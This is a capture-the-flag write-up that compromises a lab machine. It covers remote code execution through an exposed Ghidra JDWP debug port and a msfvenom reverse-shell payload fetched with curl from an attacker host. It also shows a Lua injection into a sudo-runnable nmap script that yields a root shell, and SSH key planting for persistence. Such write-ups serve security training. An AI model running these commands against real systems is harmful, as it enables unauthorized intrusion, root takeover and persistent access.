Leet Computer
Pentesting, Ghidra JDWP RCE, Sudo Misconfiguration, NSE Scripting

Problem

One of the attacker is still in the airport hall, and it seems that he is still connected to the airport wifi ! Get a root shell on its machine to continue your investigation.
This challenge will give you access to another network.
by Masterfox

Solution

Foothold

Using nmap, we find that 10.35.2.135 is running JDWP on port 18001.
JDWP allows us to debug java applications remotely. To attach to the remote debugger: jdb -attach 10.35.2.135:18001
1
> classpath
Copied!
We see that Ghidra is being debugged. When Ghidra is launched in debug mode, a well-known vulnerability allows remote attackers to achieve RCE through the JDWP, which is opened on all interfaces.
1
> classes
Copied!
We see that the class org.apache.logging.log4j.core.util.WatchManager$WatchRunnable is used.
We will set a breakpoint at this class: stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
The breakpoint will soon be hit. We can then use print new java.lang.Runtime().exec("COMMAND") to execute arbitrary commands.

Initial Access

Now, we can make a reverse shell ELF payload with msfvenom.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.24.163 LPORT=4242 -f elf >reverse.elf
Run a Python HTTP server, and use curl on the victim machine to download the ELF payload.
Then, execute the payload.
Catch the reverse shell on our Kali machine.
Upgrade to a fully-interactive TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

We can find some interesting files on e11i0t's home directory.
This gives us the address range for the dev network.
There is also a Python script mail-scan.py that does a nmap scan. We can see in the below code snippet that a temporary .nse file is created and run. We can control the --mail parameter, which is reflected into the TEMPLATE_NSE.
1
parser = argparse.ArgumentParser()
2
parser.add_argument('--ip', required=True, help='IP of the Dovecot to attacc')
3
parser.add_argument('--mail', required=True, help='Mail address to check')
4
args = parser.parse_args()
5
​
6
# Arguments validation
7
ipregex = re.compile('^([0-9]{3}\.){3}[0-9]{3}#x27;)
8
if not ipregex.match(args.ip):
9
print("Error: IP argument is invalid")
10
exit(1)
11
​
12
f = NamedTemporaryFile(suffix=".nse")
13
with open(f.name, "w") as tmp_file:
14
tmp_file.write(TEMPLATE_NSE.format(mail_address=args.mail))
15
print(TEMPLATE_NSE.format(mail_address=args.mail))
16
system("nmap --script={} '{}'".format(tmp_file.name, args.ip))
Copied!
Here is the location where the mail parameter is injected:
1
portrule = shortport.port_or_service({{25, 465, 587}},
2
{{"smtp", "smtps", "submission"}})
3
​
4
​
5
action = function(host, port)
6
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or "uname"
7
--Prepare payload
8
cmd = string.gsub(cmd, " ", "${{IFS}}")
9
cmd = string.gsub(cmd, ";", "``")
10
​
11
local user = stdnse.get_script_args(SCRIPT_NAME..".user") or nil
12
local pwd = stdnse.get_script_args(SCRIPT_NAME..".pwd") or nil
13
local from = stdnse.get_script_args(SCRIPT_NAME..".from") or "[email protected]"..smtp.get_domain(host)
14
local to = "{mail_address}"
15
local conn_timeout = stdnse.get_script_args(SCRIPT_NAME..".timeout") or 8000
16
local smtp_domain = stdnse.get_script_args(SCRIPT_NAME..".domain") or smtp.get_domain(host)
Copied!
From the LinPEAS output, we also found that the mail-scan.py script can be executed as sudo with NOPASSWD.
From GTFOBins, I found that we can use os.execute("/bin/sh") to spawn a root shell since we are running as root. All that's left is to deal with the quotes on both sides of local to = "{mail_address}".
If we use "; os.execute("/bin/sh"); local var=" as the mail paramter, we inject the following into the nmap script:
1
local to = ""; os.execute("/bin/sh"); local var=""
Copied!
Hence, we get a shell as root! Note that the action function only runs if any ports in {25, 465, 587} are discovered, however, so we would need to use nc -nlvp 465 to open up the port on our Kali machine in order to trigger the action function and our os.execute() command.
Subsequently, we can use ssh-keygen to generate new key pairs for SSH, and add the public key to /root/.ssh/authorized_keys for easier pivoting. Now we can directly SSH into the root shell.

References

Last modified 6mo ago